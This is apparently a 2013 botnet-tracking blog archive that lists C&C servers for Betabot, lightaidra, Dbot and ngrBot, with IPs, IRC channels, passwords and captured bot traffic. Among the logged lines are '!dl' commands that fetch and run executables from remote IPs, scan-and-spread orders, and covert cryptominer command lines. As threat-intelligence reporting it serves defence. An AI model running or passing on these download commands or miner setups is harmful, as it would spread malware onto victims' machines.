Month: May 2013

guard4you.info (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved guard4you.info to 80.82.66.26 Server:  guard4you.info Gate file:  /customer/order.php Alternate domains:  nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...

31.31.77.195(lightaidra Router Botnet hosted in Czech Republic Hluboka Nad Vltavou Wedos Internet A.s.)

Uncategorized

This bot infects routers Credits to x00 31.31.77.195:5060 Current Local Users: 2528 Max: 2534 Current Global Users: 2528 Max: 2534 Now talking in #sc4n Topic: .sc4n->random->b root admin Topic: Set by [infected (unknown address)] at (Mon May 06 02:31:20 2013) #sc4n x00 @Albert-Wesker @infected 400 linux bots   http://ircqk.nixhosting.org/conf/mel   x00@x00 /tmp $ file melRead more...

irc.antisecbrteam.tk(Dbot hosted in Brazil Sao Paulo Royalfit Comercio De Artigos Esportivos Ltda)

Uncategorized

Resolved : [irc.antisecbrteam.tk] To [201.54.16.10] Server: 201.54.16.10:6667 Server Password: Username: zbotmhz Nickname: L2-3891 Channel: #SpkB2 (Password: SpkDbot762) Channeltopic: Now talking in #SpkB2 Topic On: [ #SpkB2 ] [ .scan 75 1 177.x.x.x 2 1 177.x.x.x ] Topic By: [ xHide ]  around 110 Dbots used for vnc brute and spread JOIN #SpkB0 SpkBot762 Now talkingRead more...

e.balkrev.com(ngrBot hosted in China Changsha Chinanet Hunan Province Network)

Uncategorized

Resolved : [e.balkrev.com] To [124.232.150.214] Resolved : [e.balkrev.com] To [60.172.229.40] Resolved : [e.balkrev.com] To [124.232.163.154] Resolved : [e.balkrev.com] To [124.232.163.150] Resolved : [e.balkrev.com] To [124.232.163.119] TCP Traffic: e.balkrev.com:6510 PASS smart Data received: :Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss  so channelsRead more...

were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

Uncategorized

Thanks to anonymous guy in this post for the sample Resolved : [were.hacked.jp] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {x00-00-DEU-XP-DELL-9640}Channel: ###x00### (Password: )Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x sample here hosting infos: http://whois.domaintools.com/176.31.123.56

208.89.209.54 (Irc botnet hosted by virpus.com)

Uncategorized

Server:  208.89.209.54 Port:  6667 Current global users 77, max 695 Channels: #goon            3        #aryan           39       #OFFLINE#flood           1        ##yBz##          15       ##Offline##      19    Aryan bots: Channel:  #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel:  ##Offline## Channel:  ##yBz## Hosting infos:  http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)

Uncategorized

Resolved betabros.in to 146.0.78.4 Server:  betabros.in Gate file:  /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...

jkdef8.ws (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved jkdef8.ws to 94.102.51.117 Server:  jkdef8.ws Gate file:  /papka/order.php Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws Bitcoin mining info:  http://pooledbits.com:8337 -u nigfinity.1 -p x Hosting infos: http://whois.domaintools.com/94.102.51.117

msn.3utilities.com (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved  msn.3utilities.com to 80.82.66.43 Server:  msn.3utilities.com Port:  81 Gate file:  /help/order.php Alternate domains: videoparadise.biz kittybook.biz        msn1981.3utilities.com dates4you.tk Three out of the five domains are free and easy to get suspended. Pro botherder here. Bitcoin mining info:  stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3 Litecoin mining info:  -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0Read more...